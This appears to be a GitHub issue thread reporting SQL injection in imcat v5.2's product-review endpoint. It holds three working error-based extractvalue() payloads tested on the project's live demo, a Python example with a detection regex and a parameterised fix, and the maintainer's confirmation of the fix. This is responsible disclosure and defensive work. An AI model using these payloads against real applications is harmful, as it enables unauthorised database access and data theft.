Hi, I would like to report a SQL injection vulnerability in the latest release (v5.2), product reviews (/root/plus/coms/add_coms.php).
I found it in the demo (https://imcat.txjia.com/chn.php?crem&pid=2015-9h-n441).
Add a product review.
Test the fm[auser] field in the request body.
payload: 'and/**/extractvalue('anything',concat('~',(select user())))and'
payload: 'and/**/extractvalue('anything',concat('~',(select @@datadir)))and'
payload: 'and/**/extractvalue('anything',concat('~',(select database())))and'
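Added example, not code from the issue or from the imcat project: it shows why the fm[auser] probes above work (a `'` closes the string literal, and `extractvalue()` on an XPath expression beginning with `~` raises MySQL error 1105, which echoes the concatenated data back in the error text), how to flag such probes in request logs, and how a parameterised insert keeps the same payload as plain data. The query shape in `build_insert_naive` is an assumption; the real statement in add_coms.php is not shown in the report, and the MySQL error line is a constructed sample. The fix uses in-memory SQLite only so the round trip runs offline; PDO/mysqli prepared statements behave the same way.

```python
"""Error-based SQL injection via extractvalue(): probe, detection, fix."""
import re
import sqlite3
from typing import Optional

# The first payload from the report, verbatim.
PAYLOAD = "'and/**/extractvalue('anything',concat('~',(select user())))and'"


def build_insert_naive(auser: str) -> str:
    """Assumed (hypothetical) shape of the vulnerable statement: the value is
    interpolated into the SQL text, so the leading and trailing quotes of the
    payload close and reopen the literal and the middle becomes SQL."""
    return f"INSERT INTO coms (auser) VALUES ('{auser}')"


# The payload uses /**/ in place of spaces; normalise that before matching.
_COMMENT_WS = re.compile(r"/\*.*?\*/", re.S)
_PROBE = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)


def is_error_based_probe(value: str) -> bool:
    """Flag the MySQL XML functions that leak data through XPATH syntax errors."""
    normalised = _COMMENT_WS.sub(" ", value)
    return bool(_PROBE.search(normalised))


# MySQL reports: ERROR 1105 (HY000): XPATH syntax error: '~<data>'
# because '~' is not a valid XPath token; the server echoes the expression
# (truncated to 32 characters in practice, hence the usual substr() chunking).
_XPATH_ERR = re.compile(r"XPATH syntax error: '~(.*)'")


def leaked_value(mysql_error: str) -> Optional[str]:
    """Recover the exfiltrated data from the error text, as the probe intends."""
    m = _XPATH_ERR.search(mysql_error)
    return m.group(1) if m else None


def insert_parameterised(auser: str) -> str:
    """Hardened form: a placeholder binds the value as data, so the payload is
    stored character for character and never reaches the SQL parser."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE coms (id INTEGER PRIMARY KEY, auser TEXT)")
    con.execute("INSERT INTO coms (auser) VALUES (?)", (auser,))
    return con.execute("SELECT auser FROM coms").fetchone()[0]


if __name__ == "__main__":
    print(build_insert_naive(PAYLOAD))
    # Constructed sample of the server's reply to the first payload.
    sample_err = "ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'"
    print(leaked_value(sample_err))
    print(is_error_based_probe(PAYLOAD))
    print(insert_parameterised(PAYLOAD) == PAYLOAD)
```

The detector is deliberately narrow (extractvalue/updatexml after comment normalisation); it is a triage aid for request logs, not a substitute for the parameterised insert, which is the actual fix.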
Thanks!
I checked this error message. It worked OK for inserting the review; it is a bug when dealing with accumulated points for the member. By the way, did you log in as a member?
I fixed this on the site: https://imcat.txjia.com/. Can it stop you from attacking?
Hoping for your message; I'll update the master branch after you've checked it.
Great. I just rechecked the SQL injection on the demo and it has been fixed.
By the way, I wasn't logged in when I found the vulnerability.
OK, Thanks!
Hi, can you help me request a CVE? Requesting a CVE identification number - GitHub Docs. Thanks.